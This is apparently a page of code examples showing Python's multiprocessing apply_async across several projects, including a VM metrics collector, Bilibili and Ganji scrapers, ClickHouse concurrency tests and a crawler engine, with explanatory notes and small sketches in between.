                self._inspect_cpu(insp, inst, inst_name, instance_cache,
                                  metric_cache, dims_customer, dims_operations)
            if not self._collect_intervals['disk']['skip']:
                if self.init_config.get('vm_disks_check_enable'):
                    self._inspect_disks(insp, inst, inst_name, instance_cache,
                                        metric_cache, dims_customer,
                                        dims_operations)
                if self.init_config.get('vm_extended_disks_check_enable'):
                    self._inspect_disk_info(insp, inst, inst_name,
                                            instance_cache, metric_cache,
                                            dims_customer, dims_operations)

            if not self._collect_intervals['vnic']['skip']:
                if self.init_config.get('vm_network_check_enable'):
                    self._inspect_network(insp, inst, inst_name,
                                          instance_cache, metric_cache,
                                          dims_customer, dims_operations)

            # Memory utilization
            # (req. balloon driver; Linux kernel param CONFIG_VIRTIO_BALLOON)
            try:
                mem_stats = inst.memoryStats()
                mem_metrics = {
                    'mem.free_mb':
                    float(mem_stats['unused']) / 1024,
                    'mem.swap_used_mb':
                    float(mem_stats['swap_out']) / 1024,
                    'mem.total_mb':
                    float(mem_stats['available']) / 1024,
                    'mem.used_mb':
                    float(mem_stats['available'] - mem_stats['unused']) / 1024,
                    'mem.free_perc':
                    float(mem_stats['unused']) /
                    float(mem_stats['available']) * 100
                }
                for name in mem_metrics:
                    self.gauge(
                        name,
                        mem_metrics[name],
                        dimensions=dims_customer,
                        delegated_tenant=instance_cache.get(
                            inst_name)['tenant_id'],
                        hostname=instance_cache.get(inst_name)['hostname'])
                    self.gauge("vm.{0}".format(name),
                               mem_metrics[name],
                               dimensions=dims_operations)
                memory_info = insp.inspect_memory_resident(inst)
                self.gauge('vm.mem.resident_mb',
                           float(memory_info.resident),
                           dimensions=dims_operations)
            except KeyError:
                self.log.debug(
                    "Balloon driver not active/available on guest {0} ({1})".
                    format(
                        inst_name,
                        instance_cache.get(inst_name)['hostname'].encode(
                            'utf8')))
            # Test instance's remote responsiveness (ping check) if possible
            if (self.init_config.get('vm_ping_check_enable')
                ) and self.init_config.get(
                    'ping_check') and 'network' in instance_cache.get(
                        inst_name):
                for net in instance_cache.get(inst_name)['network']:
                    ping_args = [
                        dims_customer, dims_operations, inst_name,
                        instance_cache, net
                    ]
                    ping_results.append(
                        self.pool.apply_async(self._run_ping, ping_args))

        # Save these metrics for the next collector invocation
        self._update_metric_cache(metric_cache,
                                  math.ceil(time.time() - time_start))

        # Publish aggregate metrics
        for gauge in agg_gauges:
            self.gauge(agg_gauges[gauge],
                       agg_values[gauge],
                       dimensions=dims_base)

        # Check results of ping tests
        self._check_ping_results(ping_results)

    def _calculate_rate(self, current_value, cache_value, time_diff):
        """Calculate rate based on current, cache value and time_diff."""
        try:
            rate_value = (current_value - cache_value) / time_diff
        except ZeroDivisionError as e:
            self.log.error("Time difference between current time and "
                           "last_update time is 0 . {0}".format(e))
            #
            # Being extra safe here, in case we divide by zero
            # just skip this reading with check below.
            #
            rate_value = -1
        return rate_value

    def _update_dims_with_metadata(self, instance_cache, inst_name,
                                   dim_operations):
        """Update operations dimensions with metadata."""
        dims = dim_operations
        if self.init_config.get('metadata'):
            for metadata in self.init_config.get('metadata'):
                if 'vm_name' == metadata:
                    metadata_value = (
                        instance_cache.get(inst_name).get('hostname'))
                else:
                    metadata_value = (
                        instance_cache.get(inst_name).get(metadata))
                if metadata_value:
                    dims[metadata] = metadata_value
        return dims

    def _get_this_host_aggregate(self, nova_client):
        """Determine the host aggregate for this hypervisor."""
        host_agg_cfg_re = self.init_config.get('host_aggregate_re', None)
        if not host_agg_cfg_re:
            return

        try:
            agg_re = re.compile(host_agg_cfg_re)
            aggs = nova_client.aggregates.list()
            for idx, agg in enumerate(aggs):
                if re.match(
                        agg_re,
                        aggs[idx].name) and self.hostname in aggs[idx].hosts:
                    self._host_aggregate = str(aggs[idx].name)
                    #
                    # Not expecting multiple matches, if we've got a match we're done.
                    #
                    break

        except Exception as e:
            msg = "Failed to list host aggregates, won't publish aggregate dimension: '{0}'"
            self.log.error(msg.format(e))
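
The ping check in this example fans out one subprocess per VM address with pool.apply_async and later resolves the AsyncResult objects with wait()/successful()/get(). Below is a self-contained sketch of that collect-then-check pattern; run_probe() stands in for _run_ping(), and the ping flags assume a typical Linux ping binary.

# Minimal sketch of the fan-out / collect pattern used for the ping checks.
from multiprocessing.dummy import Pool as ThreadPool
import subprocess


def run_probe(target):
    res = subprocess.call(['ping', '-c', '1', '-W', '1', target],
                          stdout=subprocess.DEVNULL,
                          stderr=subprocess.DEVNULL)
    return res, target


if __name__ == '__main__':
    pool = ThreadPool(4)
    pending = [pool.apply_async(run_probe, (t, ))
               for t in ('127.0.0.1', '127.0.0.2')]
    pool.close()
    for result in pending:
        result.wait()
        if result.successful():          # False if run_probe raised
            status, target = result.get()
            print(target, 'reachable' if status == 0 else 'unreachable')
    pool.join()
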
Example #47
0
                        break
                    time.sleep(1)


cookies = read_cookie('./bilicookies')[0]
thread = 0


def task(cookies):
    bi = BILI(cookies)
    bi.run(av_num='6524145', floor=12, content="拿自己视频测试-7")
    # bi.run('8562550', floor=266)
    # print bi.get_comment_num(bi.get_newest())
    # bi.send_comment(bi.get_newest(),"什么")
    # bi.send_comment('6524145', '拿自己视频测试')
    # bi.run(floor=1)
    # bi.run()
    # bi.run('8562550',floor=270)


if thread == 1:
    threadnum = 10
    pool = ThreadPool(threadnum)
    for i in xrange(threadnum):
        result = pool.apply_async(task, (cookies, ))
        time.sleep(1)
    pool.close()
    pool.join()
else:
    task(cookies)
Example #48
0
    content = BeautifulSoup(response.text, "xml")
    # <d p="190.56399536133,5,25,15138834,1465868252,0,61dba469,1957402211">弹幕字幕</d>
    danmaku_raw = [x for x in content.select('i')[0].select('d')]
    danmaku_data = [{
        'aid': aid,
        'cid': cid,
        'time': float(x.attrs['p'].split(',')[0]),
        'mode': int(x.attrs['p'].split(',')[1]),
        'font': int(x.attrs['p'].split(',')[2]),
        'color': ("#%06x" % int(x.attrs['p'].split(',')[3], 10)).upper(),
        'date': float(x.attrs['p'].split(',')[4]),
        'pool': int(x.attrs['p'].split(',')[5]),
        'hash': x.attrs['p'].split(',')[6],
        'id': int(x.attrs['p'].split(',')[7]),
        'text': x.string
        } for x in danmaku_raw]
    DANMAKULIST.insert_many(danmaku_data)


if __name__ == '__main__':
    MULTIPOOL = ThreadPool(16)
    for avid in open('videoaid.csv', 'r'):
        params = {'aid': avid}
        resp = requests.get(url=API_PAGELIST, params=params)
        if resp.status_code == 200:
            pages = resp.json()
            for page in pages:
                MULTIPOOL.apply_async(getdanmaku, (avid, page['cid']))
    MULTIPOOL.close()
    MULTIPOOL.join()
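
The parser above splits the same 'p' attribute eight times per comment. A small sketch of parsing it once into named fields follows; the field order is inferred from the sample line in the comment and should be treated as an assumption about the API's format.

# Minimal sketch: parse one danmaku 'p' attribute with a single split.
def parse_p(p_value, text, aid=None, cid=None):
    time_s, mode, font, color, date, pool_id, user_hash, dm_id = p_value.split(',')[:8]
    return {
        'aid': aid,
        'cid': cid,
        'time': float(time_s),
        'mode': int(mode),
        'font': int(font),
        'color': ('#%06x' % int(color, 10)).upper(),
        'date': float(date),
        'pool': int(pool_id),
        'hash': user_hash,
        'id': int(dm_id),
        'text': text,
    }


if __name__ == '__main__':
    sample = '190.56399536133,5,25,15138834,1465868252,0,61dba469,1957402211'
    print(parse_p(sample, 'sample text', aid=1, cid=2))
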
Example #49
0
def update_current_popularity(addr_and_id, conn, doBackup, doLog, proxy,
                              num_processes):
    formatted_address_list = addr_and_id[
        0]  #formatted addresses of all open valid stores
    open_ids = addr_and_id[1][0]
    closed_ids = addr_and_id[1][1]
    print("LEN OPEN: ", len(open_ids), "LEN CLOSED: ", len(closed_ids))
    global BACKUP
    global LOG

    if num_processes is None:
        print("without processes")
        #for ind in range(10):
        for ind in range(len(formatted_address_list)):
            place_data = lpt.get_populartimes_by_formatted_address(
                formatted_address_list[ind], proxy)
            log = update_row(conn, place_data, open_ids[ind])
            if doBackup == True:
                BACKUP.write(json.dumps(place_data, indent=4))
                BACKUP.write("\r\n")

            if doLog == True:
                for entry in log:
                    LOG.write(entry)
                    LOG.write("\r\n")

        cur = conn.cursor()
        #clean up closed stores
        cur.execute(
            "UPDATE map_store SET live_busyness=NULL WHERE id IN {closed}".
            format(closed=tuple(closed_ids)))
        conn.commit()

    else:
        pool = Pool(num_processes)
        place_data = {}
        #for ind in range(len(formatted_address_list)):
        for ind in range(len(formatted_address_list)):
            place_data[ind] = pool.apply_async(
                lpt.get_populartimes_by_formatted_address,
                args=(
                    formatted_address_list[ind],
                    proxy,
                ))

        pool.close()
        for ind in range(len(formatted_address_list)):
            try:
                place_data[ind] = place_data[ind].get()
            except Exception:
                # get() just re-raises the worker's exception, so retrying is pointless;
                # skip addresses whose lookup failed
                continue

        for ind in range(len(formatted_address_list)):
            log = update_row(conn, place_data[ind], open_ids[ind])
            #print("updated store iD ", open_ids[ind])
            if doBackup == True:
                # back up this store's data (matches the single-process branch)
                BACKUP.write(json.dumps(place_data[ind], indent=4))
                BACKUP.write("\r\n")
            if doLog == True:
                for entry in log:
                    LOG.write(entry)
                    LOG.write("\r\n")

        #clean up closed stores
        cur = conn.cursor()
        cur.execute(
            "UPDATE map_store SET live_busyness=NULL WHERE id IN {closed}".
            format(closed=tuple(closed_ids)))
        conn.commit()
        return
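
Note that the string-formatted IN clause above produces invalid SQL when closed_ids holds a single element (trailing comma) or is empty, and it is injection-prone; a sketch of a placeholder-based alternative, assuming a DB-API driver that uses "?" (qmark) placeholders such as sqlite3:

def clear_closed_stores(conn, closed_ids):
    """Set live_busyness to NULL for every closed store id."""
    if not closed_ids:
        return
    # one "?" placeholder per id, so single-element and large lists both stay valid SQL
    placeholders = ",".join("?" * len(closed_ids))
    sql = "UPDATE map_store SET live_busyness=NULL WHERE id IN ({})".format(placeholders)
    cur = conn.cursor()
    cur.execute(sql, tuple(closed_ids))
    conn.commit()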
Example #50
0
def run_as_thread_pool():
    pool = ThreadPool(3)
    for x in range(10):
        pool.apply_async(worker, args=(x, ))
    pool.close()
    pool.join()
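
Example #50 assumes that ThreadPool and worker are defined elsewhere; a self-contained version with a trivial stand-in worker might look like this.

from multiprocessing.dummy import Pool as ThreadPool


def worker(x):
    # stand-in worker; replace with real work
    print("processing", x)


def run_as_thread_pool():
    pool = ThreadPool(3)
    for x in range(10):
        pool.apply_async(worker, args=(x, ))
    pool.close()
    pool.join()


if __name__ == "__main__":
    run_as_thread_pool()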
Example #51
0
def mGanji(urlPage, addr, service):
    """
    Fetch the listing page, collect the content-page URLs it links to, and if pagination
    links are found, call itself recursively after the content pages have been fetched.
    :param urlPage:
    :param addr:
    :param service:
    :return:
    """
    # open a virtual display for the headless browser
    display = Display(visible=0, size=(800, 800))
    display.start()

    # fetch all available proxies (status == 0)
    proxyList = iproxy.find({"status":0}).limit(30)
    if not proxyList:
        time.sleep(600)
        proxyList = iproxy.find({"status": 0})
        if not proxyList:
            sys.exit(0)

    proxy_list = []
    for iii in proxyList:
        proxy_list.append(iii["iproxy"].encode("utf-8"))

    # pick a random proxy and split it into ip and port
    proxy = random.choice(proxy_list)
    ip, port = proxy.split(":")

    print ("当前使用代理 %s:%s,获取列表页:%s" % (ip,port,urlPage))
    logging.info('当前使用代理:%s:%s,获取列表页:%s' % (ip,port,urlPage))
    #设置firefox 的参数,如果是chrome或者其他浏览器这个参数无法通用
    proxy_settings = {'network.proxy.type': 1,
     'network.proxy.no_proxies_on':'172.0.0.0/8,10.0.0.0/8,localhost,127.0.0.0/8,::1',
     'network.proxy.http':ip,'network.proxy.http_port':port,
     'network.proxy.ssl':'172.1.1.1','network.proxy.ssl_port':8080}

    # fetch the listing page with a 60 s timeout
    try:
        #browser = Browser(driver_name="firefox")
        browser = Browser(driver_name="firefox", profile_preferences=proxy_settings,timeout=60)
        browser.driver.set_page_load_timeout(50)
        browser.visit(urlPage)
        time.sleep(5)
    except:
        print ('Failed to fetch listing page, recording to errorurl: %s:%s listing page: %s' % (ip, port, urlPage))
        logging.info('Failed to fetch listing page, recording to errorurl: %s:%s listing page: %s' % (ip, port, urlPage))
        errorurl.insert_one({"url": urlPage, "addr": addr, "service": service, "iproxy": proxy})
        try:
            browser.quit()
        except:
            pass

        display.stop()
        return False

    time.sleep(1)

    # collect both kinds of content-page links and merge the lists
    urlList= browser.find_by_xpath('//*[@class="list-noimg"]/div[1]/p[1]/a')
    urlList2 = browser.find_by_xpath('//*[@class="list-img"]/div[1]/a')
    urlList.extend(urlList2)
    # URL list of the target content pages
    urls = []
    for ii in  urlList:

        urlss = ii["href"].encode("utf-8")
        #try:
        print ("新增内容页: %s" % urlss)
        logging.info('新增内容页: %s' % (urlss))
        p1 = re.compile('http')
        p2 = re.compile('\d+x?\/$')
        p3 = re.compile('\/[^\/]+\/$')
        p4 = "/#tabl"

        if not re.search(p2, urlss):
            urlss = re.sub(p3, p4, urlss)
            print "网址修正为:%s" % urlss
        #if re.search(p1, urlss) and urlss not in urls:
        if urlss not in urls:
            urls.append(urlss)
            print ("加入待抓取列表:", urlss)
            logging.info('加入待抓取列表: %s' % (urlss))

    pageList= browser.find_by_xpath('//*[@class="pageBox"]/ul/li/a')
    for i in  pageList:
        urlPages = str(i["href"])
        p = r"http"

        try:
            if urlPages not in pagesAll and re.search(p,urlPages) and not urldone.find_one({"url": urlPages}):
                print ("获取到新的列表页:%s" % urlPages)
                logging.info('获取到新的列表页: %s' % (urlPages))
                pagesAll.append(urlPages)
        except:
            print ("Maybe none.")

    # close the browser and the virtual display
    browser.quit()
    display.stop()


    # f = Fetcher(threads=6, addr=addr, service=service)
    from multiprocessing.dummy import Pool as ThreadPool
    pool = ThreadPool(processes=5)
    results = []
    for url in urls:
        result = pool.apply_async(getContent, (url,addr,service))
        results.append(result)
    print ("开始抓取url内容,共%d条。" % len(urls))
    logging.info('开始抓取url内容,共%d条。' % len(urls))
    # pool.close()
    # pool.join()  # 调用join之前,先调用close函数,否则会出错。执行完close后不会有新的进程加入到pool,join函数等待所有子进程结束
    for i in results:
        i.wait()  # wait for the worker call to finish

    for i in results:
        if i.ready():  # has the call completed?
            if i.successful():  # did it finish without raising?
                if i.get() == "stop":
                    sys.exit(0)

                #print(i.get())  # the worker's return value
    print "Sub-process(es) done."

    pagesDone.append(urlPage)
    urldone.insert_one({"url": urlPage,"addr":addr, "service":service})

    for i in pagesAll:
        if i not in pagesDone:
            mGanji(i, addr, service)
    return True
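
Example #51 waits on each AsyncResult instead of calling close()/join() before collecting results; a minimal, self-contained sketch of that wait()/ready()/successful() pattern (with a stand-in fetch function) is shown below.

from multiprocessing.dummy import Pool as ThreadPool


def fetch(url):
    # stand-in for getContent(url, addr, service)
    return "stop" if url.endswith("/last") else "ok"


if __name__ == "__main__":
    urls = ["http://example.com/a", "http://example.com/b", "http://example.com/last"]
    pool = ThreadPool(processes=5)
    results = [pool.apply_async(fetch, (url, )) for url in urls]

    for r in results:
        r.wait()  # block until this call has finished

    for r in results:
        if r.ready() and r.successful():  # finished and did not raise
            if r.get() == "stop":
                print("a worker asked us to stop")

    pool.close()
    pool.join()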
Example #52
0
def test_rename_distributed_parallel_insert_and_select(started_cluster):
    table_name = 'test_rename_distributed_parallel_insert_and_select'
    try:
        create_distributed_table(node1, table_name)
        insert(node1, table_name, 1000)

        p = Pool(15)
        tasks = []
        for i in range(1):
            tasks.append(
                p.apply_async(rename_column_on_cluster,
                              (node1, table_name, 'num2', 'foo2', 3, True)))
            tasks.append(
                p.apply_async(rename_column_on_cluster,
                              (node1, '%s_replicated' % table_name, 'num2',
                               'foo2', 3, True)))
            tasks.append(
                p.apply_async(rename_column_on_cluster,
                              (node1, table_name, 'foo2', 'foo3', 3, True)))
            tasks.append(
                p.apply_async(rename_column_on_cluster,
                              (node1, '%s_replicated' % table_name, 'foo2',
                               'foo3', 3, True)))
            tasks.append(
                p.apply_async(rename_column_on_cluster,
                              (node1, table_name, 'foo3', 'num2', 3, True)))
            tasks.append(
                p.apply_async(rename_column_on_cluster,
                              (node1, '%s_replicated' % table_name, 'foo3',
                               'num2', 3, True)))
            tasks.append(
                p.apply_async(
                    insert, (node1, table_name, 10, ["num", "foo3"], 5, True)))
            tasks.append(
                p.apply_async(
                    insert, (node2, table_name, 10, ["num", "num2"], 5, True)))
            tasks.append(
                p.apply_async(
                    insert, (node3, table_name, 10, ["num", "foo2"], 5, True)))
            tasks.append(
                p.apply_async(select,
                              (node1, table_name, "foo2", None, 5, True)))
            tasks.append(
                p.apply_async(select,
                              (node2, table_name, "foo3", None, 5, True)))
            tasks.append(
                p.apply_async(select,
                              (node3, table_name, "num2", None, 5, True)))
        for task in tasks:
            task.get(timeout=240)

        rename_column_on_cluster(node1, table_name, 'foo2', 'num2', 1, True)
        rename_column_on_cluster(node1, '%s_replicated' % table_name, 'foo2',
                                 'num2', 1, True)
        rename_column_on_cluster(node1, table_name, 'foo3', 'num2', 1, True)
        rename_column_on_cluster(node1, '%s_replicated' % table_name, 'foo3',
                                 'num2', 1, True)

        insert(node1, table_name, 1000, col_names=['num', 'num2'])
        select(node1, table_name, "num2")
        select(node2, table_name, "num2")
        select(node3, table_name, "num2")
        select(node4, table_name, "num2")
    finally:
        drop_distributed_table(node1, table_name)
Example #53
0
def pai_dataset(filename,
                feature_metas,
                feature_column_names,
                label_meta,
                pai_table,
                single_file,
                cache,
                rank=0,
                nworkers=1,
                batch_size=None,
                feature_column_code="",
                raw_data_dir=None):
    from subprocess import Popen, PIPE
    from multiprocessing.dummy import Pool  # ThreadPool
    import queue

    dname = filename
    if single_file:
        dname = filename + '.dir'

    if os.path.exists(dname):
        shutil.rmtree(dname, ignore_errors=True)

    os.mkdir(dname)

    slice_count = get_pai_table_slice_count(pai_table, nworkers, batch_size)

    thread_num = min(int(slice_count / nworkers), 128)

    pool = Pool(thread_num)
    complete_queue = queue.Queue()

    def thread_worker(slice_id):
        p = Popen("{} -m {}".format(sys.executable, __name__),
                  shell=True,
                  stdin=PIPE)
        p.communicate(
            json.dumps([
                dname, feature_metas, feature_column_names, label_meta,
                pai_table, slice_id, slice_count, feature_column_code,
                raw_data_dir
            ]))

        assert p.returncode == 0, "The subprocess raises error when reading data"
        complete_queue.put(slice_id)

    slice_id = rank
    slice_total = 0
    while slice_id < slice_count:
        pool.apply_async(thread_worker, (slice_id, ))
        slice_id += nworkers
        slice_total += 1

    if batch_size is None:
        pool.close()
        pool.join()
        yield load_dmatrix('{0}#{0}.cache'.format(dname) if cache else dname)
        return

    for _ in six.moves.range(slice_total):
        slice_id = complete_queue.get(block=True)
        if not single_file:
            downloaded_file = "./{}/{}.txt".format(dname, slice_id)
            # ignore empty files or the xgb.DMatrix will throw error.
            if Path(downloaded_file).stat().st_size > 0:
                yield load_dmatrix('{0}#{0}.cache'.format(downloaded_file)
                                   if cache else downloaded_file)
                os.unlink(downloaded_file)

    if single_file:

        def merge_files(dir_name, file_name):
            cmd = "cat %s/*.txt > %s" % (dir_name, file_name)
            p = Popen(cmd, shell=True, stdin=PIPE, stderr=PIPE)
            out, err = p.communicate()
            if err:
                raise Exception("merge data files failed: %s" % err)

        merge_files(dname, filename)
        if raw_data_dir:
            merge_files(raw_data_dir, '{}.raw'.format(filename))

        yield load_dmatrix(
            '{0}#{0}.cache'.format(filename) if cache else filename)

    pool.close()
    pool.join()
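
The completion-queue pattern above, where each worker pushes its slice id into a queue so the main thread can stream results in completion order, reduces to this self-contained sketch (the slice work is a stand-in).

from multiprocessing.dummy import Pool
import queue
import time


def process_slice(slice_id, complete_queue):
    time.sleep(0.1)               # stand-in for downloading and decoding one slice
    complete_queue.put(slice_id)  # signal that this slice is ready


if __name__ == "__main__":
    slice_count = 8
    complete_queue = queue.Queue()
    pool = Pool(4)
    for slice_id in range(slice_count):
        pool.apply_async(process_slice, (slice_id, complete_queue))

    # consume slices in completion order, not submission order
    for _ in range(slice_count):
        finished = complete_queue.get(block=True)
        print("slice %d is ready" % finished)

    pool.close()
    pool.join()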
Example #54
0
def test_concurrent_alter_with_ttl_move(started_cluster, name, engine):
    try:
        node1.query("""
            CREATE TABLE {name} (
                EventDate Date,
                number UInt64
            ) ENGINE = {engine}
            ORDER BY tuple()
            PARTITION BY toYYYYMM(EventDate)
            SETTINGS storage_policy='jbods_with_external'
        """.format(name=name, engine=engine))

        values = list({random.randint(1, 1000000) for _ in range(0, 1000)})

        def insert(num):
            for i in range(num):
                day = random.randint(11, 30)
                value = values.pop()
                month = '0' + str(random.choice([3, 4]))
                node1.query(
                    "INSERT INTO {} VALUES(toDate('2019-{m}-{d}'), {v})".
                    format(name, m=month, d=day, v=value))

        def alter_move(num):
            def produce_alter_move(node, name):
                move_type = random.choice(["PART", "PARTITION"])
                if move_type == "PART":
                    for _ in range(10):
                        try:
                            parts = node1.query(
                                "SELECT name from system.parts where table = '{}' and active = 1"
                                .format(name)).strip().split('\n')
                            break
                        except QueryRuntimeException:
                            pass
                    else:
                        raise Exception("Cannot select from system.parts")

                    move_part = random.choice(
                        ["'" + part + "'" for part in parts])
                else:
                    move_part = random.choice([201903, 201904])

                move_disk = random.choice(["DISK", "VOLUME"])
                if move_disk == "DISK":
                    move_volume = random.choice(
                        ["'external'", "'jbod1'", "'jbod2'"])
                else:
                    move_volume = random.choice(["'main'", "'external'"])
                try:
                    node1.query(
                        "ALTER TABLE {} MOVE {mt} {mp} TO {md} {mv}".format(
                            name,
                            mt=move_type,
                            mp=move_part,
                            md=move_disk,
                            mv=move_volume))
                except QueryRuntimeException:
                    pass

            for i in range(num):
                produce_alter_move(node1, name)

        def alter_update(num):
            for i in range(num):
                node1.query(
                    "ALTER TABLE {} UPDATE number = number + 1 WHERE 1".format(
                        name))

        def alter_modify_ttl(num):
            for i in range(num):
                ttls = []
                for j in range(random.randint(1, 10)):
                    what = random.choice([
                        "TO VOLUME 'main'", "TO VOLUME 'external'",
                        "TO DISK 'jbod1'", "TO DISK 'jbod2'",
                        "TO DISK 'external'"
                    ])
                    when = "now()+{}".format(random.randint(-1, 5))
                    ttls.append("{} {}".format(when, what))
                try:
                    node1.query("ALTER TABLE {} MODIFY TTL {}".format(
                        name, ", ".join(ttls)))
                except QueryRuntimeException:
                    pass

        def optimize_table(num):
            for i in range(num):
                try:  # optimize may throw after concurrent alter
                    node1.query("OPTIMIZE TABLE {} FINAL".format(name),
                                settings={'optimize_throw_if_noop': '1'})
                    break
                except:
                    pass

        p = Pool(15)
        tasks = []
        for i in range(5):
            tasks.append(p.apply_async(insert, (100, )))
            tasks.append(p.apply_async(alter_move, (100, )))
            tasks.append(p.apply_async(alter_update, (100, )))
            tasks.append(p.apply_async(alter_modify_ttl, (100, )))
            tasks.append(p.apply_async(optimize_table, (100, )))

        for task in tasks:
            task.get(timeout=120)

        assert node1.query("SELECT 1") == "1\n"
        assert node1.query("SELECT COUNT() FROM {}".format(name)) == "500\n"
    finally:
        node1.query("DROP TABLE IF EXISTS {name} NO DELAY".format(name=name))
Example #55
0
class Engine(object):
    def __init__(self):

        # 1. create the objects for each component
        self.spiders = self.__auto_import(settings.SPIDERS, is_spider=True)

        # 2. create the stats collector in __init__
        self.stats_collector = StatsCollector(self.spiders.keys())
        # 3. pass the stats collector into the scheduler through its __init__
        self.scheduler = Scheduler(self.stats_collector)

        self.downloader = Downloader()
        self.pipelines = self.__auto_import(settings.PIPELINES)

        # initialise the spider middlewares and downloader middlewares
        # 1. __init__ receives the spider middleware list and the downloader middleware list
        self.spider_middlewares = self.__auto_import(
            settings.SPIDER_MIDDLEWARES)
        self.downloader_middlewares = self.__auto_import(
            settings.DOWNLOADER_MIDDLEWARES)

        # counter for the total number of responses
        # self.total_response_count = 0

        # 1. create the thread pool in __init__
        self.pool = Pool()
        # counter for the number of spiders whose start requests have all been submitted
        self.start_requests_finished_spider_count = 0

    def __auto_import(self, full_names, is_spider=False):
        """
        根据全类名列表, 创建类对象, 添加到容器中进行返回
        :param full_names: 全类名列表
        :param is_spider:  是不是爬虫, 如果是爬虫返回字典, 否则就返回列表
        :return: 如果是爬虫返回字典, 否则就返回列表
        """
        # 定义变量, 用于存储返回的结果
        # 如果是爬虫, 就是字典, 否则就列表
        instances = {} if is_spider else []

        # 变量full_name, 获取每一个类的全名, 根据全名创建对象, 添加结果集中
        for full_name in full_names:
            # 获取模块名和类名
            module_name, class_name = full_name.rsplit('.', maxsplit=1)
            # 通过模块名, 导入模块
            module = importlib.import_module(module_name)
            # 通过类名, 从模块中取出该类
            cls = getattr(module, class_name)
            # 通过类创建对象
            instance = cls()
            # 把对象存储结果集中
            if is_spider:
                # instance.name: 爬虫名称
                # instance: 爬虫对象
                instances[instance.name] = instance
            else:
                instances.append(instance)

        # 返回对象结果: 如果是爬虫返回是爬虫字典, 其他返回时对象列表
        return instances

    def start(self):
        # public method that starts the engine
        # record the start time
        start = datetime.now()
        logger.info("Start time: {}".format(start))
        self.__start()
        end = datetime.now()
        logger.info("Total requests: {}".format(self.stats_collector.request_nums))
        logger.info("Start requests: {}".format(
            self.stats_collector.start_request_nums))
        logger.info("Filtered duplicate requests: {}".format(
            self.stats_collector.repeat_request_nums))
        logger.info("Total responses handled: {}".format(self.stats_collector.response_nums))

        logger.info("End time: {}".format(end))
        logger.info("Total time: {} s".format((end - start).total_seconds()))

        # when distributed mode is enabled, clear the statistics when the program ends
        if settings.SCHEDULER_PERSIST:
            self.stats_collector.clear()
            # FP_PERSIST == True enables resumable crawling: keep the requests and fingerprints in Redis on exit
            # FP_PERSIST == False disables it: clear the requests and fingerprints in Redis on exit
            if not settings.FP_PERSIST:
                # clear the scheduler's request queue and fingerprint container
                self.scheduler.clear()

    def __error_callback(self, ex):
        # log the error with the logging module
        try:
            raise ex
        except Exception as e:
            logger.exception(e)

    def __execute_callback(self, temp):
        # loop via the callback so __execute_request_response_item keeps being re-submitted
        self.pool.apply_async(self.__execute_request_response_item,
                              callback=self.__execute_callback,
                              error_callback=self.__error_callback)

    def __start(self):
        # core start-up logic of the engine

        # 2. run __add_start_requests and __execute_request_response_item asynchronously
        # 1. add the start requests to the scheduler
        self.pool.apply_async(self.__add_start_requests,
                              error_callback=self.__error_callback)

        # launch multiple asynchronous worker loops
        for i in range(settings.ASYNC_COUNT):
            # 3. keep __execute_request_response_item looping through the asynchronous callback
            # 2. it handles requests, responses and item data
            # error_callback: invoked when the asynchronous task raises internally
            self.pool.apply_async(self.__execute_request_response_item,
                                  callback=self.__execute_callback,
                                  error_callback=self.__error_callback)

        # give the asynchronous tasks a moment to start running
        time.sleep(0.1)

        while True:
            # sleep briefly before checking the exit condition to avoid busy-waiting
            time.sleep(0.1)

            # if some spiders' start requests have not all been submitted yet, keep waiting
            if self.start_requests_finished_spider_count < len(self.spiders):
                # skip the rest of this iteration and check again
                continue

            # 3. exit condition: every request has been handled
            # compare the total request count with the number of responses handled;
            # requests are counted in the scheduler's add_request (every request passes through it),
            # responses are counted in __execute_request_response_item, which processes each response
            # exit once responses handled >= total requests
            if self.stats_collector.response_nums >= self.stats_collector.request_nums:
                # all requests have been handled, so we can stop
                break

    def __execute_request_response_item(self):
        """用于处理请求, 响应和Item数据的"""

        # 1 / 0 # 此处会报错

        # 调用调度器get_request方法, 获取请求对象
        request = self.scheduler.get_request()

        # look up the spider this request belongs to
        spider = self.spiders[request.spider_name]

        for downloader_middleware in self.downloader_middlewares:
            # let each downloader middleware process the request
            request = downloader_middleware.process_request(request)

        # fetch the response for this request through the downloader
        response = self.downloader.get_response(request)

        # 2.2 copy the request's meta onto the response
        response.meta = request.meta

        for downloader_middleware in self.downloader_middlewares:
            # let each downloader middleware process the response
            response = downloader_middleware.process_response(response)

        # let each spider middleware process the response
        for spider_middleware in self.spider_middlewares:
            response = spider_middleware.process_response(response)
        # parse the response; the parse function may return multiple results
        # 2.1 if the request has a callback, use it to handle the response
        if request.callback:
            results = request.callback(response)
        else:
            # otherwise fall back to the spider's parse method
            results = spider.parse(response)

        # make sure the results are iterable; wrap a single result in a list
        if not isinstance(results, Iterable):
            results = [results]

        # results is guaranteed to be iterable here
        for result in results:
            if isinstance(result, Request):
                # let each spider middleware process the new request
                for spider_middleware in self.spider_middlewares:
                    result = spider_middleware.process_request(result)

                # tag the request with the spider's name
                result.spider_name = spider.name

                # a Request produced by parsing goes back into the scheduler
                self.scheduler.add_request(result)
            else:
                # anything that is not a request is treated as item data
                # and passed through the pipelines' process_item
                for pipeline in self.pipelines:
                    result = pipeline.process_item(result, spider)

        # count one more handled response
        self.stats_collector.incr(self.stats_collector.response_nums_key)

    def __add_one_spider_start_requests_callback(self, temp):
        # one more spider has finished submitting its start requests
        self.start_requests_finished_spider_count += 1

    def __add_start_requests(self):
        """Add the start requests to the scheduler."""
        # call each spider's start_requests to get its start request objects;
        # start_requests is a generator, so it has to be iterated

        for spider_name, spider in self.spiders.items():
            # self.__add_one_spider_start_requests(spider, spider_name)
            # call the method asynchronously instead
            self.pool.apply_async(
                self.__add_one_spider_start_requests,
                args=(spider, spider_name),
                callback=self.__add_one_spider_start_requests_callback)

    def __add_one_spider_start_requests(self, spider, spider_name):
        """Add one spider's start requests to the scheduler."""
        for request in spider.start_requests():
            # tag the request with its spider's name
            request.spider_name = spider_name

            # let each spider middleware process the request
            for spider_middleware in self.spider_middlewares:
                request = spider_middleware.process_request(request)
            # hand the request to the scheduler
            self.scheduler.add_request(request)
            # count this start request in the stats collector
            self.stats_collector.incr(
                self.stats_collector.start_request_nums_key)
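
The callback chain in Example #55 (__execute_callback re-submits __execute_request_response_item, so each worker slot keeps looping) can be illustrated with a small, bounded, self-contained sketch; the chain/step bookkeeping here is illustrative only.

from multiprocessing.dummy import Pool
import time

pool = Pool(2)
CHAINS = 2   # like ASYNC_COUNT: the number of concurrent worker loops
STEPS = 5    # iterations per loop in this bounded demo
done = []


def handle_one(chain_id, step):
    # stand-in for __execute_request_response_item: process one unit of work
    time.sleep(0.05)
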